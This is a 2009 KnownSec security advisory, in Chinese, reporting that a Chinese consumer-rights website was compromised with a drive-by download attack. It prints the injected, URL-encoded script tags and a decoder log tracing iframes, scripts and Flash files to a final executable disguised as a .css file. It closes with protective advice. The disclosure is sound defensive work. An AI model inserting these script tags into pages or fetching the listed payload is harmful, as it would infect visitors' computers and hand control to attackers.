发布时间:Wed Oct 21 2009 18:46:58 UTC+0800
最后更新时间:Wed Oct 21 2009 18:46:58 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国质量维权协作网(http://www.51315.com.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.51315.com.cn/

网页被嵌入恶意链接代码:
<script src=http://%77%75%78%69%66%64%63%2E%63%6E></script><script src=http://%7A%67%75%6E%69%6F%6E%2E%63%6E></script><script src=http://%68%6F%68%68%6F%74%6A%6F%62%2E%63%6E></script><script src=http://%6E%6D%67%7A%6C%74%2E%63%6E></script><script src=http://%73%68%65%6E%67%6C%76%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%79%6F%75%64%75%6E%7A%69%2E%63%6E></script><script src=http://8204%38.%63n></script><script src=http://czj%6A%7Ac%2Ec%6E></script><script src=http://%6Cink%73ne%74%2Ec%6E></script><script src=http://%77u%78%69ol%2Ec%6E></script><script src=http://%63h%75%6Era%6E%67.co%6D%2E%63%6E></script><script src=http://hn%33gp.%63n></script>

挂马分析:
Log generated by issmall use mdecoder 0.30
[root]http://www.51315.com.cn/
    [script]http://wuxifdc.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://zgunion.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://hohhotjob.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://nmgzlt.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://shenglve.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://egenome.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://egenome.cn
    [script]http://clannt.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://513148.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://youdunzi.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://82048.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://czjjzc.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://linksnet.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://wuxiol.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://chunrang.com.cn
        [iframe]http://sale.php?domain=chunrang.com.cn
    [script]http://hn3gp.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
            [iframe]http://0os0d.cn/x2/xx.html
                [iframe]http://0os0d.cn/x2/td14.htm
                    [script]http://0os0d.cn/x2/14.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://0os0d.cn/x2/15.js
                    [script]http://0os0d.cn/x2/17.js
                    [script]http://0os0d.cn/x2/16.js
                    [script]http://0os0d.cn/x2/18.js
                [iframe]http://0os0d.cn/x2/yt.htm
                    [script]http://0os0d.cn/x2/pps.jpg
                    [script]http://0os0d.cn/x2/url.jpg
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://0os0d.cn/x2/c.jpg
                    [script]http://0os0d.cn/x2/d.jpg
                    [script]http://0os0d.cn/x2/e.jpg
                    [script]http://0os0d.cn/x2/f.jpg
                [iframe]http://0os0d.cn/x2/td09.htm
                    [script]http://0os0d.cn/x2/01.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://0os0d.cn/x2/02.js
                [iframe]http://0os0d.cn/x2/yut.htm
                    [iframe]http://0os0d.cn/x2/ytfl1.htm
                        [iframe]http://0os0d.cn/x2/x1.htm
                            [script]http://0os0d.cn/x2/swfobject.js
                            [flash]http://0os0d.cn/x2/./x1.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x3.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x4.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x2.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/x2.htm
                            [script]http://0os0d.cn/x2/swfobject.js
                            [flash]http://0os0d.cn/x2/./x7.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x9.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x10.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x8.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/x1.htm
                    [iframe]http://0os0d.cn/x2/of.htm
                        [script]http://0os0d.cn/x2/of.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [script]http://0os0d.cn/x2/of3.jpg
                        [script]http://0os0d.cn/x2/of.jpg
                        [script]http://0os0d.cn/x2/of2.jpg
                [iframe]http://0os0d.cn/x2/ytu.htm
                    [iframe]http://0os0d.cn/x2/ytfl.htm
                        [iframe]http://0os0d.cn/x2/ff.html
                            [script]http://0os0d.cn/x2/ff.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/ie.html
                            [script]http://0os0d.cn/x2/ie.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/ff.html
                        [iframe]http://0os0d.cn/x2/ie.html
                        [iframe]http://0os0d.cn/x2/ff.html
                        [iframe]http://0os0d.cn/x2/ff.html
    [script]http://wuxifdc.cn
    [script]http://zgunion.cn
    [script]http://hohhotjob.cn
    [script]http://nmgzlt.cn
    [script]http://shenglve.cn
    [script]http://egenome.cn
    [script]http://egenome.cn
    [script]http://clannt.cn
    [script]http://513148.cn
    [script]http://youdunzi.cn
    [script]http://82048.cn
    [script]http://czjjzc.cn
    [script]http://linksnet.cn
    [script]http://wuxiol.cn
    [script]http://chunrang.com.cn
    [script]http://hn3gp.cn
    [script]http://wuxifdc.cn
    [script]http://zgunion.cn
    [script]http://hohhotjob.cn
    [script]http://nmgzlt.cn
    [script]http://shenglve.cn
    [script]http://egenome.cn
    [script]http://egenome.cn
    [script]http://clannt.cn
    [script]http://513148.cn
    [script]http://youdunzi.cn
    [script]http://82048.cn
    [script]http://czjjzc.cn
    [script]http://linksnet.cn
    [script]http://wuxiol.cn
    [script]http://chunrang.com.cn
    [script]http://hn3gp.cn
    [script]http://wuxifdc.cn
    [script]http://zgunion.cn
    [script]http://hohhotjob.cn
    [script]http://nmgzlt.cn
    [script]http://shenglve.cn
    [script]http://egenome.cn
    [script]http://egenome.cn
    [script]http://clannt.cn
    [script]http://513148.cn
    [script]http://youdunzi.cn
    [script]http://82048.cn
    [script]http://czjjzc.cn
    [script]http://linksnet.cn
    [script]http://wuxiol.cn
    [script]http://chunrang.com.cn
    [script]http://hn3gp.cn
最终下载病毒文件:
http://d.iopqw.com/xx/x2.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:12
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]